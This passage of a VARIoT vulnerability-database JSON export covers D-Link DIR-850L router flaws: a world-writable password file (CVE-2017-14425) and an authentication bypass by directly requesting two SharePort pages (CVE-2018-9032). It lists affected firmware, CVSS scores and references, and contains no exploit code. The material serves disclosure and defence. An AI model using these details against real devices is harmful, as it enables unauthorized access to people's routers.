        "date": "2017-09-21T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105142"
      },
      {
        "date": "2017-09-21T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-14421"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008133"
      },
      {
        "date": "2023-11-08T20:59:00.723000",
        "db": "NVD",
        "id": "CVE-2017-14421"
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-574"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-574"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Vulnerabilities related to the use of hard-coded credentials in device firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008133"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "trust management problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-574"
      }
    ],
    "trust": 0.6
  }
}

VAR-201709-0596

Vulnerability from variot - Updated: 2023-12-18 13:14

D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0666 (world-readable and world-writable) permissions on /var/etc/hnapasswd. The D-Link DIR-850L device firmware contains vulnerabilities related to authorization, permissions, and access control. Information may be obtained or altered, and service operation may be disrupted (DoS). The D-Link DIR-850L REV. A and REV. B are both D-Link wireless router products. A security vulnerability exists in REV. A devices using firmware FW114WWb07_h2ab_beta1 and earlier and in REV. B devices using firmware FW208WWb02 and earlier. An attacker could use this vulnerability to retrieve a password.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201709-0596",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab_beta1"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "fw208wwb02"
      },
      {
        "model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "rev.b \u003c=fw208wwb02",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw114wwb07_h2ab"
      },
      {
        "model": "dir-850l",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "d link",
        "version": "fw208wwb02"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31784"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008100"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14425"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-570"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "fw114wwb07_h2ab",
                    "vulnerable": true
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "fw208wwb02",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14425"
      }
    ]
  },
  "cve": "CVE-2017-14425",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 2.1,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2017-14425",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Low",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "CNVD-2017-31784",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.6,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "VHN-105146",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "LOW",
            "trust": 0.1,
            "vectorString": "AV:L/AC:L/AU:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-14425",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-14425",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-31784",
            "trust": 0.6,
            "value": "LOW"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201709-570",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-105146",
            "trust": 0.1,
            "value": "LOW"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31784"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105146"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008100"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14425"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-570"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) and REV. B (with firmware through FW208WWb02) devices have 0666 /var/etc/hnapasswd permissions. D-Link DIR-850L Device firmware contains vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LREV.A and REV.B are both D-Link wireless router products. A security vulnerability exists in the REV.B device using D-LinkDIR-850LREV.A and FW208WWb02 and previous firmware versions of FW114WWb07_h2ab_beta1 and previous firmware. An attacker could use this vulnerability to retrieve a password",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-14425"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008100"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31784"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105146"
      }
    ],
    "trust": 2.25
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-14425",
        "trust": 3.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008100",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-570",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-31784",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-105146",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31784"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105146"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008100"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14425"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-570"
      }
    ]
  },
  "id": "VAR-201709-0596",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31784"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105146"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31784"
      }
    ]
  },
  "last_update_date": "2023-12-18T13:14:08.036000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "DIR-850L",
        "trust": 0.8,
        "url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
      },
      {
        "title": "D-Link DIR-850L REV.A  and REV.B Security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=100050"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008100"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-570"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-276",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-105146"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008100"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14425"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14425"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14425"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31784"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105146"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008100"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14425"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-570"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-31784"
      },
      {
        "db": "VULHUB",
        "id": "VHN-105146"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008100"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-14425"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-570"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31784"
      },
      {
        "date": "2017-09-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105146"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008100"
      },
      {
        "date": "2017-09-13T17:29:00.680000",
        "db": "NVD",
        "id": "CVE-2017-14425"
      },
      {
        "date": "2017-09-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-570"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-27T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-31784"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULHUB",
        "id": "VHN-105146"
      },
      {
        "date": "2017-10-10T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-008100"
      },
      {
        "date": "2023-11-17T20:00:45.137000",
        "db": "NVD",
        "id": "CVE-2017-14425"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201709-570"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-570"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "D-Link DIR-850L Vulnerabilities related to authorization, authority, and access control in device firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-008100"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201709-570"
      }
    ],
    "trust": 0.6
  }
}

VAR-201803-1970

Vulnerability from variot - Updated: 2023-12-18 13:08

An authentication bypass vulnerability on D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router (Hardware Version: A1, B1; Firmware Version: 1.02-2.06) devices potentially allows attackers to bypass the SharePort Web Access Portal by directly visiting /category_view.php or /folder_view.php. This suggests that the two pages are served without the portal's login check. The D-Link DIR-850L device contains an authentication vulnerability. Information may be obtained or altered, and service operation may be disrupted (DoS). The D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router is a wireless router product of D-Link. An authentication bypass vulnerability exists in the D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router. An attacker could exploit the vulnerability to bypass the SharePort Web Access Portal by directly accessing the /category_view.php or /folder_view.php file.


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201803-1970",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "2.06"
      },
      {
        "model": "dir-850l",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02"
      },
      {
        "model": "dir-850l",
        "scope": "lte",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.02 from  2.06"
      },
      {
        "model": "dir-850l wireless ac1200 dual band gigabit cloud router",
        "scope": null,
        "trust": 0.6,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-06792"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003365"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-9032"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "2.06",
                    "versionStartIncluding": "1.02",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:a1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dir-850l:b1:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-9032"
      }
    ]
  },
  "cve": "CVE-2018-9032",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 7.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2018-9032",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "NONE",
            "baseScore": 5.8,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.6,
            "id": "CNVD-2018-06792",
            "impactScore": 4.9,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.6,
            "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2018-9032",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2018-9032",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2018-06792",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201803-992",
            "trust": 0.6,
            "value": "CRITICAL"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-06792"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-003365"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-9032"
      },
      {
